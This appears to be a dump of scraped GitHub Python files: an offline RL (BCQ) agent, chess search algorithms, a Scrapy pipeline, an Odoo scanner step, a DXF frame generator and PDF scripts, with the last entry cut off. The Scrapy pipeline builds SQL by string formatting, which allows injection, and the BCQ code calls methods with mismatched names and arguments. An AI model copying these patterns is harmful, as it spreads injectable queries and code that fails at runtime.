+{"seq_id":"35934783736","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef init_weights(m):\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.orthogonal_(m.weight)\n\n\nclass Actor(nn.Module):\n def __init__(self, state_dim, action_dim, max_action, image_obs, cnn):\n super(Actor, self).__init__()\n\n self.image_obs = image_obs\n self.cnn = cnn\n self.cnn_out = state_dim * 4 * 4\n if image_obs:\n state_dim = state_dim ** 2\n\n if image_obs and cnn:\n self.cnn = nn.Sequential(\n nn.Conv2d(1, 32, 8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, 4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, 3, stride=1, padding=0),\n nn.ReLU(),\n )\n self.fcn = nn.Sequential(\n nn.Linear(self.cnn_out, 512),\n nn.ReLU(),\n nn.Linear(512, 256)\n )\n self.cnn.apply(init_weights)\n else:\n self.fcn = nn.Sequential(\n nn.Linear(state_dim, 256),\n nn.ReLU()\n )\n\n self.l1 = nn.Linear(256, 256)\n self.l2 = nn.Linear(256, action_dim)\n\n self.max_action = max_action\n\n def forward(self, state):\n if self.image_obs and self.cnn:\n state = self.cnn(state)\n state = state.view(-1, self.cnn_out)\n state = self.fcn(state)\n a = F.relu(self.l1(state))\n return self.max_action * torch.tanh(self.l2(a))\n\n\nclass Critic(nn.Module):\n def __init__(self, state_dim, action_dim, image_obs, cnn):\n super(Critic, self).__init__()\n\n self.image_obs = image_obs\n self.cnn = cnn\n self.cnn_out = state_dim * 4 * 4\n if image_obs:\n state_dim = state_dim ** 2\n\n if image_obs and cnn:\n self.cnn = nn.Sequential(\n nn.Conv2d(1, 32, 8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, 4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, 3, stride=1, padding=0),\n nn.ReLU()\n )\n self.fcn_1 = nn.Sequential(\n nn.Linear(self.cnn_out + action_dim, 512),\n nn.ReLU(),\n nn.Linear(512, 256)\n )\n self.fcn_2 = nn.Sequential(\n nn.Linear(self.cnn_out + action_dim, 512),\n nn.ReLU(),\n nn.Linear(512, 256)\n )\n self.cnn.apply(init_weights)\n else:\n self.fcn_1 = nn.Sequential(\n nn.Linear(state_dim + action_dim, 256),\n nn.ReLU()\n )\n self.fcn_2 = nn.Sequential(\n nn.Linear(state_dim + action_dim, 256),\n nn.ReLU()\n )\n\n # Q1 architecture\n self.l1 = nn.Linear(256, 256)\n self.l2 = nn.Linear(256, 1)\n\n # Q2 architecture\n self.l3 = nn.Linear(256, 256)\n self.l4 = nn.Linear(256, 1)\n\n def forward(self, state, action):\n if self.image_obs and self.cnn:\n state = self.cnn(state)\n state = state.view(-1, self.cnn_out)\n sa = torch.cat([state, action], 1)\n else:\n sa = torch.cat([state, action], 1)\n\n q1 = self.fcn_1(sa)\n q1 = F.relu(self.l1(q1))\n q1 = self.l2(q1)\n\n q2 = self.fcn_2(sa)\n q2 = F.relu(self.l3(q2))\n q2 = self.l4(q2)\n return q1, q2\n\n def Q1(self, state, action):\n if self.image_obs and self.cnn:\n state = self.cnn(state)\n state = state.view(-1, self.cnn_out)\n sa = torch.cat([state, action], 1)\n else:\n sa = torch.cat([state, action], 1)\n\n q1 = self.fcn_1(sa)\n q1 = F.relu(self.l1(q1))\n q1 = self.l2(q1)\n return q1\n\n\n# Vanilla Variational Auto-Encoder\nclass VAE(nn.Module):\n def __init__(self, state_dim, action_dim, latent_dim, max_action, device):\n super(VAE, self).__init__()\n self.e1 = nn.Linear(state_dim + action_dim, 750)\n self.e2 = nn.Linear(750, 750)\n\n self.mean = nn.Linear(750, latent_dim)\n self.log_std = nn.Linear(750, latent_dim)\n\n self.d1 = nn.Linear(state_dim + latent_dim, 750)\n self.d2 = nn.Linear(750, 750)\n self.d3 = nn.Linear(750, action_dim)\n\n self.max_action = max_action\n self.latent_dim = latent_dim\n self.device = device\n\n def forward(self, state, action):\n z = F.relu(self.e1(torch.cat([state, action], 1)))\n z = F.relu(self.e2(z))\n\n mean = self.mean(z)\n # Clamped for numerical stability\n log_std = self.log_std(z).clamp(-4, 15)\n std = torch.exp(log_std)\n z = mean + std * torch.randn_like(std)\n\n u = self.decode(state, z)\n\n return u, mean, std\n\n def decode(self, state, z=None):\n # When sampling from the VAE, the latent vector is clipped to [-0.5, 0.5]\n if z is None:\n z = torch.randn((state.shape[0], self.latent_dim)).to(\n self.device).clamp(-0.5, 0.5)\n\n a = F.relu(self.d1(torch.cat([state, z], 1)))\n a = F.relu(self.d2(a))\n return self.max_action * torch.tanh(self.d3(a))\n\n\nclass BCQ(object):\n def __init__(self,\n state_dim,\n action_dim, max_action, discount=0.99, tau=0.005, lmbda=0.75, phi=0.05,\n policy_noise=0.2,\n noise_clip=0.5,\n policy_freq=2,\n cnn=False, image_obs=False):\n latent_dim = action_dim * 2\n\n self.actor = Actor(state_dim, action_dim, max_action,image_obs,cnn).to(device)\n self.actor_target = copy.deepcopy(self.actor)\n self.actor_optimizer = torch.optim.Adam(\n self.actor.parameters(), lr=1e-3)\n\n self.critic = Critic(state_dim, action_dim,image_obs,cnn).to(device)\n self.critic_target = copy.deepcopy(self.critic)\n self.critic_optimizer = torch.optim.Adam(\n self.critic.parameters(), lr=1e-3)\n\n self.vae = VAE(state_dim, action_dim, latent_dim,\n max_action, device).to(device)\n self.vae_optimizer = torch.optim.Adam(self.vae.parameters())\n\n self.max_action = max_action\n self.image_obs = image_obs\n self.cnn = cnn\n self.action_dim = action_dim\n self.discount = discount\n self.tau = tau\n self.lmbda = lmbda\n self.device = device\n self.policy_noise = policy_noise\n self.noise_clip = noise_clip\n self.policy_freq = policy_freq\n self.total_it = 0\n\n def select_action(self, state):\n with torch.no_grad():\n state = torch.FloatTensor(state.reshape(\n 1, -1)).repeat(100, 1).to(self.device)\n action = self.actor(state, self.vae.decode(state))\n q1 = self.critic.q1(state, action)\n ind = q1.argmax(0)\n return action[ind].cpu().data.numpy().flatten()\n\n def train(self, replay_buffer, iterations, batch_size=100):\n\n for it in range(iterations):\n # Sample replay buffer / batch\n state, action, next_state, reward, not_done = replay_buffer.sample(\n batch_size)\n\n # Variational Auto-Encoder Training\n recon, mean, std = self.vae(state, action)\n recon_loss = F.mse_loss(recon, action)\n KL_loss = -0.5 * (1 + torch.log(std.pow(2)) -\n mean.pow(2) - std.pow(2)).mean()\n vae_loss = recon_loss + 0.5 * KL_loss\n\n self.vae_optimizer.zero_grad()\n vae_loss.backward()\n self.vae_optimizer.step()\n\n # Critic Training\n with torch.no_grad():\n # Duplicate next state 10 times\n next_state = torch.repeat_interleave(next_state, 10, 0)\n\n # Compute value of perturbed actions sampled from the VAE\n target_Q1, target_Q2 = self.critic_target(\n next_state, self.actor_target(next_state, self.vae.decode(next_state)))\n\n # Soft Clipped Double Q-learning\n target_Q = self.lmbda * \\\n torch.min(target_Q1, target_Q2) + (1. -\n self.lmbda) * torch.max(target_Q1, target_Q2)\n # Take max over each action sampled from the VAE\n target_Q = target_Q.reshape(\n batch_size, -1).max(1)[0].reshape(-1, 1)\n\n target_Q = reward + not_done * self.discount * target_Q\n\n current_Q1, current_Q2 = self.critic(state, action)\n critic_loss = F.mse_loss(\n current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n # Pertubation Model / Action Training\n sampled_actions = self.vae.decode(state)\n perturbed_actions = self.actor(state, sampled_actions)\n\n # Update through DPG\n actor_loss = -self.critic.q1(state, perturbed_actions).mean()\n\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # Update Target Networks\n for param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n target_param.data.copy_(\n self.tau * param.data + (1 - self.tau) * target_param.data)\n\n for param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n target_param.data.copy_(\n self.tau * param.data + (1 - self.tau) * target_param.data)\n \n def save(self, filename):\n \n torch.save(self.critic.state_dict(), filename + \"_critic\")\n torch.save(self.critic_optimizer.state_dict(), filename + \"_critic_optimizer\")\n\n torch.save(self.actor.state_dict(), filename + \"_actor\")\n torch.save(self.actor_optimizer.state_dict(), filename + \"_actor_optimizer\")\n\n def load(self, filename):\n self.critic.load_state_dict(torch.load(filename + \"_critic\"))\n self.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n self.critic_target = copy.deepcopy(self.critic)\n\n self.actor.load_state_dict(torch.load(filename + \"_actor\"))\n self.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n self.actor_target = copy.deepcopy(self.actor)\n print(\"\\nloaded the model successfully\\n\")\n","repo_name":"Ingenious-c0der/Wildfire-Agents","sub_path":"gym_forestfire/agents/bcq.py","file_name":"bcq.py","file_ext":"py","file_size_in_byte":10801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17014316348","text":"import chess\n\nclass ChessHelper:\n @staticmethod\n def evaluate(gameState: chess.Board):\n pawn = 100\n knight = 300\n bishop = 300\n rook = 500\n queen = 900\n king = 2500\n mobilityWeight = 10\n \n whitepawns = len(gameState.pieces(1,1))\n whiteknights = len(gameState.pieces(2,1))\n whitebishops = len(gameState.pieces(3,1))\n whiterooks = len(gameState.pieces(4,1))\n whitequeens = len(gameState.pieces(5,1))\n whiteking = len(gameState.pieces(6,1))\n \n blackpawns = len(gameState.pieces(1,0))\n blackknights = len(gameState.pieces(2,0))\n blackbishops = len(gameState.pieces(3,0))\n blackrooks = len(gameState.pieces(4,0))\n blackqueens = len(gameState.pieces(5,0))\n blackking = len(gameState.pieces(6,0))\n \n whitematerial = pawn*whitepawns + knight*whiteknights + bishop*whitebishops + \\\n rook*whiterooks + queen*whitequeens +king*whiteking\n blackmaterial = pawn*blackpawns + knight*blackknights + bishop*blackbishops + \\\n rook*blackrooks + queen*blackqueens +king*blackking\n material = whitematerial - blackmaterial\n \n mobility1 = gameState.legal_moves.count()\n gameState.push(chess.Move.null())\n mobility2 = gameState.legal_moves.count()\n gameState.pop()\n if (gameState.turn == chess.WHITE):\n mobility = mobility1 - mobility2\n else:\n mobility = mobility2 - mobility1\n\n mobility = mobilityWeight * mobility\n return material + mobility\n def __init__(self, depth=2):\n self.depth = int(depth)\n\nclass NegaMax(ChessHelper):\n def getAction(self, gameState: chess.Board):\n def negamax(state: chess.Board, color, depth=self.depth):\n if depth == 0 or state.outcome() is not None:\n return None\n\n legalActions = state.legal_moves\n bestScore = float('-inf')\n bestAction = None\n\n for action in legalActions:\n state.push(action)\n score = -recursiveNegamax(state, -color, depth - 1)\n if score > bestScore:\n bestScore = score\n bestAction = action\n state.pop()\n return bestAction\n\n def recursiveNegamax(state: chess.Board, color, depth):\n if depth == 0 or state.outcome() is not None:\n return color * self.evaluate(state)\n\n legalActions = state.legal_moves\n bestScore = float('-inf')\n\n for action in legalActions:\n state.push(action)\n score = -recursiveNegamax(state, -color, depth - 1)\n bestScore = max(bestScore, score)\n state.pop()\n\n return bestScore\n\n color = 1 if gameState.turn else -1\n return negamax(gameState, color=color)\n\n\nclass NegaScout(ChessHelper):\n def getAction(self, gameState: chess.Board):\n def negascout(state: chess.Board, color, depth=self.depth, alpha=float('-inf'), beta=float('inf')):\n if depth == 0 or state.outcome() is not None:\n return None\n\n legalActions = state.legal_moves\n a = alpha\n b = beta\n isFirstMove = True\n bestAction = None\n\n for action in legalActions:\n state.push(action)\n score = negascoutRecursion(state, -color, depth - 1, -b, -alpha)\n if a < score < b and depth <= 2 and not isFirstMove:\n a = -negascoutRecursion(state, -color, depth - 1, -beta, -score)\n state.pop()\n if score > a:\n a = score\n bestAction = action\n\n if a >= beta:\n return action\n b = a + 1\n isFirstMove = False\n\n return bestAction\n\n def negascoutRecursion(state: chess.Board, color, depth, alpha, beta):\n if depth == 0 or state.outcome() is not None:\n return color * self.evaluate(state)\n\n legalActions = state.legal_moves\n a = alpha\n b = beta\n isFirstMove = True\n\n for action in legalActions:\n state.push(action)\n score = negascoutRecursion(state, -color, depth - 1, -b, -alpha)\n if a < score < b and depth <= 2 and not isFirstMove:\n a = -negascoutRecursion(state, -color, depth - 1, -beta, -score)\n state.pop()\n a = max(a, score)\n if a >= beta:\n return a\n b = a + 1\n isFirstMove = False\n\n return a\n\n color = 1 if gameState.turn else -1\n return negascout(gameState, color=color)\n\n\nclass PVS(ChessHelper):\n\n def getAction(self, gameState: chess.Board):\n def pvs(state: chess.Board, color, depth=self.depth, alpha=float('-inf'), beta=float('inf')):\n if depth == 0 or state.outcome() is not None:\n return None\n\n legalActions = state.legal_moves\n bestAction = None\n\n bSearchPv = True\n for action in legalActions:\n state.push(action)\n if bSearchPv:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n else:\n score = -pvsRecursion(state, -color, depth - 1, -alpha - 1, -alpha)\n if score > alpha:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n state.pop()\n if score >= beta:\n return action\n if score > alpha:\n alpha = score\n bSearchPv = False\n bestAction = action\n\n return bestAction\n\n def pvsRecursion(state: chess.Board, color, depth, alpha, beta):\n if depth == 0 or state.outcome() is not None:\n return color * self.evaluate(state)\n\n legalActions = state.legal_moves\n bSearchPv = True\n\n for action in legalActions:\n state.push(action)\n if bSearchPv:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n else:\n score = -pvsRecursion(state, -color, depth - 1, -alpha - 1, -alpha)\n if score > alpha:\n score = -pvsRecursion(state, -color, depth - 1, -beta, -alpha)\n state.pop()\n if score >= beta:\n return beta\n if score > alpha:\n alpha = score\n bSearchPv = False\n\n return alpha\n\n color = 1 if gameState.turn else -1\n return pvs(gameState, color=color)\n\nclass Game:\n def __init__(self, player, ai, p_color):\n self.gameState = chess.Board()\n\n if player == 1:\n self.player = NegaMax\n elif player == 2:\n self.player = NegaScout\n elif player == 3:\n self.player = PVS\n\n if ai == 1:\n self.ai = NegaMax\n elif ai == 2:\n self.ai = NegaScout\n elif ai == 3:\n self.ai = PVS\n\n self.p_color = p_color\n\n def nextMove(self):\n turn = self.gameState.turn\n if turn == self.p_color:\n self.makePlayerMove()\n else:\n self.makeAiMove()\n\n def makeAiMove(self):\n agent = self.ai(2)\n action = agent.getAction(self.gameState.copy())\n self.gameState.push(action)\n\n def makePlayerMove(self):\n agent = self.player(1)\n action = agent.getAction(self.gameState.copy())\n self.gameState.push(action)\n\n def isFinished(self):\n return self.gameState.outcome() is not None\n\n# 1 - negamax, 2 - negascout, 3 - pvs\n\ngame = Game(2, 1, 1)\ni = 1\nwhile not game.isFinished():\n print('========' + str(i) + '========')\n print(game.gameState)\n game.nextMove()\n i += 1\nprint(game.gameState.outcome())\n \n","repo_name":"Snakeheart404/lab3_piis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14432309146","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom .dao import db_module\n\nclass ZhilianPipeline(object):\n # table_name = u'worm_zhaopin'\n table_name = 'worm_zhaopin_company'\n def process_item(self, item, spider):\n sql = \"insert into {} set city='{}',name='{}',size='{}',nature='{}',industry='{}',website='{}',address='{}'\" \\\n \"\".format(self.table_name, item.get('city'), item.get('name'), item.get('size'), item.get('nature'), item.get('industry'),\n item.get('website'), item.get('address'))\n # sql = \"insert into {} set city='{}',job_name='{}',company_name='{}',place='{}',salary='{}',job_type='{}',\" \\\n # \"release_date='{}',feedback_rate='{}',numbers='{}',education='{}'\".format(self.table_name,\n # item['city'],\n # item['job_name'],\n # item['company_name'],\n # item['place'],\n # item['salary'],\n # item['job_type'],\n # item['release_date'],\n # item['feedback_rate'],\n # item['numbers'],\n # item['education'])\n db_module.execute_into(sql)\n return item\n# city = scrapy.Field()\n# name = scrapy.Field()\n# size = scrapy.Field()\n# nature = scrapy.Field()\n# industry = scrapy.Field()\n# website = scrapy.Field()\n# address = scrapy.Field()","repo_name":"ptechen/spider","sub_path":"spider_workspace/zhilian/zhilian/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73014252379","text":"# flake8: noqa\n'Use
or to retrieve the data transmitted by the scanner.'\n'Use or to retrieve the running terminal browse record.'\n'Put the returned action code in , as a single character.'\n'Put the returned result or message in , as a list of strings.'\n'Put the returned value in , as an integer'\n\nif tracer == 'loop':\n picking = env['stock.picking'].browse(terminal.reference_document)\n move = env['stock.move'].browse(int(terminal.get_tmp_value('tmp_val1')))\n quantity = float(terminal.get_tmp_value('tmp_val2'))\n location = env['stock.location'].search([('name', '=', message)])\n\n s_m_l = {\n 'picking_id': picking.id,\n 'product_id': move.product_id.id,\n 'move_id': move.id,\n 'product_uom_id' : move.product_uom.id,\n 'location_id': picking.location_id.id,\n 'location_dest_id': location.id,\n 'qty_done': quantity,\n }\n\n if terminal.get_tmp_value('tmp_val3'):\n s_m_l['lot_id'] = int(terminal.get_tmp_value('tmp_val3'))\n\n\n\n env['stock.move.line'].create(s_m_l)\n\n\nelif tracer == 'picking':\n picking = env['stock.picking'].search([('name', '=', message)])\n picking.move_lines.move_line_ids.unlink()\n terminal.reference_document = picking.id\nelse:\n picking = env['stock.picking'].browse(terminal.reference_document)\n\nact = 'L'\nres = [(move.id, '%g %s, %s' % (move.product_uom_qty - move.quantity_done, move.product_uom.name, move.product_id.name)) for move in picking.move_lines ]\n\nif not res:\n act = 'A'\n val = ''\nelse:\n res += [('', _('Terminate receipt'))]\n","repo_name":"gabosoftape/gabosoft_stock_scanner_receipt","sub_path":"data/Receipt/scanner_scenario_step_receipt_product_selection.py","file_name":"scanner_scenario_step_receipt_product_selection.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17387978872","text":"from ezdxf.addons import r12writer\nimport copy\n# TODO:\n# add circles to layer two cutout\n\nCM_IN_AN_INCH = 2.54\ndef inches_to_cm(inches):\n cm = inches*2.54\n return cm\n\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return f\"({self.x}, {self.y})\"\n\n def copy_and_add_additional_offset(self, additional_offset: 'Point'):\n return Point(self.x + additional_offset.x, self.y + additional_offset.y)\n\n def to_tuple(self):\n return (self.x, self.y)\n\n\nclass Circle:\n def __init__(self, radius, offset: Point):\n self.radius = radius\n self.centre_offset = offset\n\n def __repr__(self):\n return f\"Circle(radius: {self.radius}, centre: {self.centre_offset})\"\n\n def draw_dxf(self, dxf):\n dxf.add_circle(self.centre_offset.to_tuple(), radius=self.radius)\n\n def copy_and_add_additional_offset(self, additional_offset: 'Point'):\n return Circle(radius=self.radius, offset=self.centre_offset.copy_and_add_additional_offset(additional_offset))\n\n def max_x(self):\n return self.centre_offset.x + self.radius\n\n\nclass RectangleDimensions:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n def __repr__(self):\n return f\"({self.width} x {self.height})\"\n\nclass Rectangle():\n # Given the height and width of the rectangle, and the offset of the bottom left corner\n def __init__(self, rectangle_dimensions: RectangleDimensions, offset: Point):\n self.offset = offset\n self.rectangle_dimensions = rectangle_dimensions\n self.corners = self.find_corners()\n\n def __repr__(self):\n return f\"Rectangle({self.rectangle_dimensions}, offset: {self.offset}, corners: {self.corners})\"\n\n def find_corners(self):\n corner_one= self.offset\n corner_two = Point(self.offset.x, (self.offset.y + self.rectangle_dimensions.height))\n corner_three = Point((self.offset.x + self.rectangle_dimensions.width), (self.offset.y + self.rectangle_dimensions.height))\n corner_four = Point((self.offset.x + self.rectangle_dimensions.width), self.offset.y)\n return [corner_one, corner_two, corner_three, corner_four]\n\n def draw_dxf(self, dxf):\n dxf.add_line(self.corners[0].to_tuple(), self.corners[1].to_tuple())\n dxf.add_line(self.corners[1].to_tuple(), self.corners[2].to_tuple())\n dxf.add_line(self.corners[2].to_tuple(), self.corners[3].to_tuple())\n dxf.add_line(self.corners[3].to_tuple(), self.corners[0].to_tuple())# back to origin\n\n def max_x(self):\n x_values = []\n for corner in self.corners:\n x_values.append(corner.x)\n return max(x_values)\n\n def copy_and_add_additional_offset(self, additional_offset: Point):\n return Rectangle(self.rectangle_dimensions, self.offset.copy_and_add_additional_offset(additional_offset))\n\nclass Line:\n def __init__(self, start: Point, end: Point):\n self.start = start\n self.end = end\n\n def __repr__(self):\n return f\"Line({self.start} to {self.end})\"\n\n def draw_dxf(self, dxf):\n dxf.add_line(self.start.to_tuple(), self.end.to_tuple())\n\n def max_x(self):\n return max(self.start.x, self.end.x)\n\n def copy_and_add_additional_offset(self, additional_offset: Point):\n return Line(self.start.copy_and_add_additional_offset(additional_offset),\n self.end.copy_and_add_additional_offset(additional_offset))\n\n\n# The real world objects that define the size I can make the frame\nclass RealWorldObjects:\n def __init__(self, lino_width_inches, lino_height_inches,\n paper_border_inches=0.5):\n # The rectangle that represents the piece of lino I'll be printing from\n self.lino = RectangleDimensions(width=inches_to_cm(lino_width_inches), height=inches_to_cm(lino_height_inches))\n\n # The rectangle that represents the paper I'll be printing onto.\n # It is determined by the size of the lino print to go in it, and the\n # size of the border I want around the print\n _paper_width = self.lino.width + (2* inches_to_cm(paper_border_inches))\n _paper_height = self.lino.height + (2* inches_to_cm(paper_border_inches))\n self.paper = RectangleDimensions(width=_paper_width, height=_paper_height)\n\n # The rectangle that represents the ternes registrations pins\n self.registration_pin = RectangleDimensions(width=inches_to_cm(1.125), height=inches_to_cm(2.125))\n\n\ndef create_layers_for_printing_without_offset_between_layers(\n real_world_objects: RealWorldObjects,\n extra_space_around_paper_inches=1,\n hinge_size=inches_to_cm(1),\n circle_radius=inches_to_cm(1/16)):\n _extra_space_around_paper=inches_to_cm(extra_space_around_paper_inches)\n\n _extra_vertical_leeway_around_hinge_layer_three=inches_to_cm(1/8)\n _extra_leeway_around_cutout_layer_three=inches_to_cm(1/8)\n\n _base_rectangle = Rectangle(\n RectangleDimensions(\n # Extra space around paper is *2 as it's on both sides\n width=real_world_objects.paper.width + (2*_extra_space_around_paper),\n height=(\n real_world_objects.paper.height +\n (2*_extra_space_around_paper) +\n # Want to be able to place the pin on the movable top piece (or the stationary section),\n # # with a bit of extra leeway given for the laser cut lines\n (real_world_objects.registration_pin.height + _extra_vertical_leeway_around_hinge_layer_three) +\n (hinge_size +_extra_vertical_leeway_around_hinge_layer_three)\n )\n ),\n # The baselayer (layer one) is just the total size, so no offset needed\n Point(0,0)\n )\n\n # Layer one is the background layer - the total size of the frame\n _layer_one = [copy.deepcopy(_base_rectangle)]\n\n # The layer to contain the lino - also has a cutout to fit the lino (with little circles on the corners for better fit)\n _layer_two_base = copy.deepcopy(_base_rectangle)\n _layer_two_cutout = Rectangle(\n RectangleDimensions(\n width=real_world_objects.lino.width,\n height=real_world_objects.lino.height\n ),\n Point(\n x=(_layer_two_base.rectangle_dimensions.width-real_world_objects.lino.width)/2,\n # Same as x offset so the cutout is the same dstance from the sides as it is\n # from the edge of the frame furthest from the hinge\n y=(_layer_two_base.rectangle_dimensions.width-real_world_objects.lino.width)/2\n )\n )\n # _layer_two_circles_on_cutout_corners\n _layer_two_cutout_corner_circles = []\n for corner in _layer_two_cutout.corners:\n _layer_two_cutout_corner_circles.append(Circle(radius=circle_radius, offset=corner))\n _layer_two = [\n _layer_two_base,\n _layer_two_cutout\n ] + _layer_two_cutout_corner_circles\n\n # The thrid and top layer with a hinge - where the paper goes.\n # Same outside shape, with an only very slightly larger cutout around the lino\n # (just to keep it from interfering), and a line cut near the top to let it fold.\n _layer_three_base = copy.deepcopy(_base_rectangle)\n # Slightly larger cutout\n _layer_three_cutout = Rectangle(\n RectangleDimensions(\n width= _layer_two_cutout.rectangle_dimensions.width + _extra_leeway_around_cutout_layer_three,\n height= _layer_two_cutout.rectangle_dimensions.height + _extra_leeway_around_cutout_layer_three\n ),\n Point (\n x=_layer_two_cutout.offset.x - (_extra_leeway_around_cutout_layer_three/2),\n y=_layer_two_cutout.offset.y - (_extra_leeway_around_cutout_layer_three/2)\n )\n )\n # Set hinge the hinge size (plus a tiny bit of wiggle room) away from the top\n _layer_three_hinge_line = Line(\n start=Point(x=0,\n y=(_base_rectangle.rectangle_dimensions.height - (hinge_size + _extra_vertical_leeway_around_hinge_layer_three))),\n end= Point(x=_base_rectangle.rectangle_dimensions.width,\n y= (_base_rectangle.rectangle_dimensions.height - (hinge_size + _extra_vertical_leeway_around_hinge_layer_three)))\n )\n _layer_three = [\n _layer_three_base,\n _layer_three_cutout,\n _layer_three_hinge_line\n ]\n return [_layer_one, _layer_two, _layer_three]\n\n\n\ndef main():\n # @@@ Change any of the numbers here\n real_world_objects = RealWorldObjects(\n lino_width_inches=2,\n lino_height_inches=2,\n paper_border_inches=0.5)\n circle_radius = inches_to_cm(1/16)\n tiny_extra_offset = inches_to_cm(1/4)\n extra_space_around_paper_inches=1\n hinge_size= inches_to_cm(1)\n file_name = \"test_printing_frame.dxf\"\n printing_frame_split_by_layers= create_layers_for_printing_without_offset_between_layers(\n real_world_objects=real_world_objects,\n extra_space_around_paper_inches= extra_space_around_paper_inches,\n hinge_size= hinge_size,\n circle_radius= circle_radius)\n\n # Add an offset for each layer, and flatten the list of shapes (previously split up by layers) into a list\n printing_frame=[]\n for layer_number, layer in enumerate(printing_frame_split_by_layers):\n # Calculate this layer's offset\n if layer_number == 0:\n x_offset = 0\n else:\n previous_layer = printing_frame_split_by_layers[layer_number-1]\n # Note that this is assuming nothing in the current layer goes to the left of 0.\n max_x_of_everything_in_previous_layer = [shape.max_x() for shape in previous_layer]\n max_width_previous_layer = max(max_x_of_everything_in_previous_layer)\n x_offset = (max_width_previous_layer + tiny_extra_offset) * layer_number\n # Add a tiny bit extra so layers don't overlap\n offset = Point(x=x_offset, y= 0)\n\n # Create a flat list of shapes (not split into layers, with each shape offset by the appropriate amount for its layer)\n for shape in layer:\n printing_frame.append(shape.copy_and_add_additional_offset(offset))\n print(shape)\n # Iterate through the list of shapes, writing them to file\n with r12writer(file_name) as dxf:\n for shape in printing_frame:\n shape.draw_dxf(dxf)\n\n\nmain()\n","repo_name":"johadalin/keyboard_footprint_dxf","sub_path":"print_frame.py","file_name":"print_frame.py","file_ext":"py","file_size_in_byte":10427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28433420148","text":"# Пусть, например, заданы три числа: a1, a2, a3. Ваша задача – по заданным трем числам определить: \n# можно ли их переставить так, чтобы сумма первых двух равнялась третьему. \n# Первая строка входного файла INPUT.TXT содержит три целых числа через пробел: a1, a2, a3. \n# В выходной файл OUTPUT.TXT выведите слово «YES», если заданные числа можно переставить так, \n# чтобы сумма первых двух равнялась третьему. В противном случае ��ыведите в выходной файл слово «NO».\n\ndef Calc(x, y, z):\n if x == (y + z) or y == (x + z) or z == (x + y):\n res = 'YES'\n else: res = 'NO'\n return res\n\nwith open('D:\\Works\\IT\\Python_Start\\Tasks\\Difficulty_1_10\\Task_970\\input.txt', 'r') as input_data:\n a1, a2, a3 = map(int, input_data.read().split())\nwith open('D:\\Works\\IT\\Python_Start\\Tasks\\Difficulty_1_10\\Task_970\\output.txt', 'w') as output_data:\n output_data.write(Calc(a1, a2, a3))\n \nprint(Calc(a1, a2, a3))","repo_name":"adachel/Python_Start","sub_path":"Education/Tasks/Difficulty_1_10/Task_970/Task_970.py","file_name":"Task_970.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31207490771","text":"from tkinter import PAGES, Variable\nfrom fpdf import FPDF\nimport pandas as pd\n\n# Create PDF object with specified settings\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\npdf.set_auto_page_break(auto=False, margin=0)\n\n# Read data from CSV file\ndf = pd.read_csv(\"topics.csv\")\n\n# Iterate over rows in dataframe and create PDF pages\nfor index, row in df.iterrows():\n pdf.add_page()\n\n # Set font, color and print topic on the page\n pdf.set_font(family=\"Times\", style='B', size=24)\n pdf.set_text_color(100, 100, 100)\n pdf.cell(w=0, h=12, txt=row[\"Topic\"], align=\"L\", ln=1)\n\n # Add horizontal line after topic\n pdf.line(10, 22, 200, 22)\n\n # Add vertical lines with interval of 10mm\n for space in range(0, 260, 10):\n pdf.line(10, 32 + space, 200, 32 + space)\n\n # Set footer at bottom of the page\n pdf.ln(265)\n pdf.set_font(family=\"Times\", style='I', size=8)\n pdf.set_text_color(100, 180, 100)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\n # Add additional pages for the topic if necessary\n for i in range(row[\"Pages\"] - 1):\n pdf.add_page()\n\n # Set footer on additional pages\n pdf.ln(277)\n pdf.set_font(family=\"Times\", style='I', size=8)\n pdf.set_text_color(100, 180, 100)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\n # Add vertical lines with interval of 10mm on additional pages\n for space in range(0, 260, 10):\n pdf.line(10, 32 + space, 200, 32 + space)\n\n# Output PDF 